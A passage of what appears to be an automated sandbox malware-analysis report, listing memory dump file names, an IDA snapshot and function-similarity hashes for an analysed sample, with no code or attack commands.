                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: 880125f1a871651c8212ad4b1a1277deeb05b06d171b9b094e54006f8a2efbda
                              • Instruction ID: 4073f4cbb4cc343189e9a27ccf840b4e857012b93af7b517d675e3339ddf463a
                              • Opcode Fuzzy Hash: 880125f1a871651c8212ad4b1a1277deeb05b06d171b9b094e54006f8a2efbda
                              • Instruction Fuzzy Hash: 4821B6B690020867C755FBA0DC46FF9333CAB69300F404549B68D97181EFB4AAC8CBA2